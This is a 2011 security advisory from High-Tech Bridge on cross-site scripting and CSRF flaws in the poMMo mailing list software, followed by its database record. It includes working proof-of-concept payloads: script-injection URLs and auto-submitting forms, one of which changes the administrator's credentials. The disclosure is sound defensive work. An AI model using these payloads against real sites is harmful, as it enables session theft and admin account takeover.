Multiple Vulnerabilities in poMMo

2011-04-26T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in poMMo which could be exploited to perform cross-site scripting and cross-site request forgery attacks. 1) Cross-site scripting (XSS) vulnerabilities in poMMo 1.1 The vulnerability exists due to input sanitation error in the "referer" parameter in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Exploitation example: http://host/index.php?referer=1"><script>alert(document.cookie)</script> 1.2 The vulnerability exists due to input sanitation error in the "site_name" parameter in admin/setup/config/general.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. Exploitation example: <form action="http://host/admin/setup/config/general.php" method="post" name="main"> <input type="hidden" name="list_name" value="Mailing List"> <input type="hidden" name="site_name" value='poMMo"><script>alert(document.cookie)</script>'> <input type="hidden" name="site_name" value="poMMo Website"> <input type="hidden" name="site_url" value="http://www.example.com/"> <input type="hidden" name="site_success" value=""> <input type="hidden" name="site_confirm" value=""> <input type="hidden" name="list_confirm" value="on"> <input type="hidden" name="list_exchanger" value="mail"> </form> <script> document.main.submit(); </script> 1.3 The vulnerability exists due to input sanitation error in the "group_name" parameter in admin/subscribers/subscribers_groups.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. Exploitation example: <form action="http://host/admin/subscribers/subscribers_groups.php" method="post" name="main"> <input type="hidden" name="group_name" value='group"><script>alert("XSS")</script>'> </form> <script> document.m ain.submit(); </script> 1.4 The vulnerability exists due to input sanitation error in the "field_name" parameter in admin/setup/setup_fields.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. Exploitation example: <form action="http://host/admin/setup/setup_fields.php" method="post" name="main"> <input type="hidden" name="field_name" value='1"><script>alert(document.cookie)</script>'> <input type="hidden" name="field_type" value="text"> </form> <script> document.main.submit(); </script> 2) Cross-site request forgery (CSRF) in poMMo The vulnerability exists due to insufficient validation of the request origin in admin/setup/config/users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change administrator`s credentials. Exploitation example: <form action="http://host/admin/setup/config/users.php" method="post" name="main"> <input type="hidden" name="admin_username" value="admin2"> <input type="hidden" name="admin_password" value="newpass"> <input type="hidden" name="admin_password2" value="newpass"> <input type="hidden" name="admin_email" value="email@example.com"> </form> <script> document.main.submit(); </sc ript>

Affected Software

CPE Name	Name	Version
	pommo	PR16.1

{"id": "HTB22976", "type": "htbridge", "bulletinFamily": "software", "title": "Multiple Vulnerabilities in poMMo", "description": "High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in poMMo which could be exploited to perform cross-site scripting and cross-site request forgery attacks. \n \n1) Cross-site scripting (XSS) vulnerabilities in poMMo \n1.1 The vulnerability exists due to input sanitation error in the \"referer\" parameter in index.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. \nExploitation example: \nhttp://host/index.php?referer=1\"><script>alert(document.cookie)</script> \n1.2 The vulnerability exists due to input sanitation error in the \"site_name\" parameter in admin/setup/config/general.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. \nExploitation example: \n<form action=\"http://host/admin/setup/config/general.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"list_name\" value=\"Mailing List\"> \n<input type=\"hidden\" name=\"site_name\" value='poMMo\"><script>alert(document.cookie)</script>'> \n<input type=\"hidden\" name=\"site_name\" value=\"poMMo Website\"> \n<input type=\"hidden\" name=\"site_url\" value=\"http://www.example.com/\"> \n<input type=\"hidden\" name=\"site_success\" value=\"\"> \n<input type=\"hidden\" name=\"site_confirm\" value=\"\"> \n<input type=\"hidden\" name=\"list_confirm\" value=\"on\"> \n<input type=\"hidden\" name=\"list_exchanger\" value=\"mail\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n1.3 The vulnerability exists due to input sanitation error in the \"group_name\" parameter in admin/subscribers/subscribers_groups.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. \nExploitation example: \n<form action=\"http://host/admin/subscribers/subscribers_groups.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"group_name\" value='group\"><script>alert(\"XSS\")</script>'> \n</form> \n<script> \ndocument.m ain.submit(); \n</script> \n1.4 The vulnerability exists due to input sanitation error in the \"field_name\" parameter in admin/setup/setup_fields.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website. Successful exploitation requires that victim is logged-in into the application and has access to administrative interface. \nExploitation example: \n<form action=\"http://host/admin/setup/setup_fields.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"field_name\" value='1\"><script>alert(document.cookie)</script>'> \n<input type=\"hidden\" name=\"field_type\" value=\"text\"> \n</form> \n<script> \ndocument.main.submit(); \n</script> \n \n2) Cross-site request forgery (CSRF) in poMMo \nThe vulnerability exists due to insufficient validation of the request origin in admin/setup/config/users.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change administrator`s credentials. \nExploitation example: \n<form action=\"http://host/admin/setup/config/users.php\" method=\"post\" name=\"main\"> \n<input type=\"hidden\" name=\"admin_username\" value=\"admin2\"> \n<input type=\"hidden\" name=\"admin_password\" value=\"newpass\"> \n<input type=\"hidden\" name=\"admin_password2\" value=\"newpass\"> \n<input type=\"hidden\" name=\"admin_email\" value=\"email@example.com\"> \n</form> \n<script> \ndocument.main.submit(); \n</sc ript> \n\n", "published": "2011-04-26T00:00:00", "modified": "2011-04-26T00:00:00", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P/"}, "href": "https://www.htbridge.com/advisory/HTB22976", "reporter": "High-Tech Bridge", "references": [], "cvelist": [], "lastseen": "2020-12-24T11:31:50", "viewCount": 22, "enchantments": {"score": {"value": 1.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-5299", "CVE-2011-5300"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101282"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26329"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2011-5299", "CVE-2011-5300"]}]}, "exploitation": null, "vulnersScore": 1.9}, "affectedSoftware": [{"version": "PR16.1", "operator": "le", "name": "pommo"}], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645441341, "score": 1659770509, "affected_software_major_version": 1666691171, "epss": 1678825578}}